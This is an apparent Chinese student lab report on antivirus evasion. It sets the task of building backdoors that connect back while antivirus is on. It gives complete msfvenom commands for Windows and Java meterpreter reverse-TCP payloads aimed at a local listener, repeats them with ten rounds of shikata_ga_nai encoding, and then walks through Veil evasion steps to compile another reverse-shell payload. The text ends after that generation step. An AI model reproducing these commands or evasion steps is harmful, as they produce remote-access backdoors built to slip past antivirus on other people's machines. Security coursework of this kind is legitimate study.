1.实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
2.实验要求
掌握免杀原理与技术
回答问题
(1)杀软是如何检测出恶意代码的?
(2)免杀是做什么?
(3)免杀的基本方法有哪些?
3.实验过程
任务一:正确使用msf编码器,veil-evasion,利用shellcode编程等免杀工具或技巧
- 使用msfvenom生成jar等文件。
输入msfvenom --list formats
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-1.exe,生成payload
但没有编码的后门程序会被杀毒软件查出,尝试用msf编码器对后门程序进行编码
使用编码器对payload进行编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-2.exe
发现一次编码后的后门程序还是很容易被查出,尝试对后门程序进行多次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-3.exe
发现多次编码后的后门程序依然会被查出,由此可知编码对后门程序的隐藏作用不大
选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -f jar > 20222328-1.jar
再对payload进行编码,输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -e x86/shikata_ga_nai -i 10 -f jar > 20222328-2.jar
发现指数小了很多,很有用
2.使用veil,加壳工具
首先下载veil,完成后输入veil
输入use evasion
使用c/meterpretermrev_tcp.py,即7号,所以输入use 7
查看虚拟机IP,然后输入set LHOST 192.168.1.105;set LPORT 2328;generate
然后输入输入cd /var/lib/veil/output/compiled/,进入文件夹并输入ls查看,再去进行检测
标签:攻防,LHOST,2328,jar,实验,msfvenom,实验报告,veil,输入 From: https://www.cnblogs.com/zyty/p/18488274